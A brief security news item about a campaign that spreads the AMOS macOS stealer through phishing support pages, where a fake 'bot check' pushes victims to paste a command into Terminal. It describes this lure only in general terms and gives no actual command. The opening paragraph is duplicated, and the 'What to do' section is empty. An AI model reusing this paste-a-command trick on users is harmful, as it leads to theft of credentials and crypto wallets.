A new attack on macOS users has been detected by CloudSek. Attackers, presumably from Russia, are distributing AtomicOS (AMOS) malware that steals passwords, crypto wallets, and system data. The attack is implemented through social engineering. Users are forced to manually run a dangerous command in the terminal.
A new attack on macOS users has been detected by CloudSek. Attackers, presumably from Russia, are distributing AtomicOS (AMOS) malware that steals passwords, crypto wallets, and system data. The attack is implemented through social engineering. Users are forced to manually run a dangerous command in the terminal.
According to The Hacker News, hackers have created a series of phishing sites that mimic the support pages of a popular provider. After opening such a page, the victim is offered to pass a «bot check.» It is known to fail, and the person is offered an «alternative» option: to copy a command from the clipboard and paste it into the terminal.
This command downloads AMOS, a known macOS malware that collects credentials, cookies, crypto wallet information, autofill data, and even screenshots from the device. Researchers found Russian-language comments in the source code of the site, confirming the involvement of Russian-speaking cybercriminals.
This is a macOS data stealer that first appeared in 2023. It is sold on the darknet as a subscription service. It is actively used to attack crypto traders, journalists, and tech workers.
The attack does not target specific companies or countries — any macOS user can become a victim, especially those who seek technical support or services through search. CloudSek notes the poor quality of implementation of phishing sites, which contain confusing instructions and interface elements for other OSes, but this does not reduce the threat.
What to do:
Recently, we reported on how Google’s threat intelligence team discovered a new malware called Lostkeys, which is attributed to a Russian government-backed cybercriminal group.
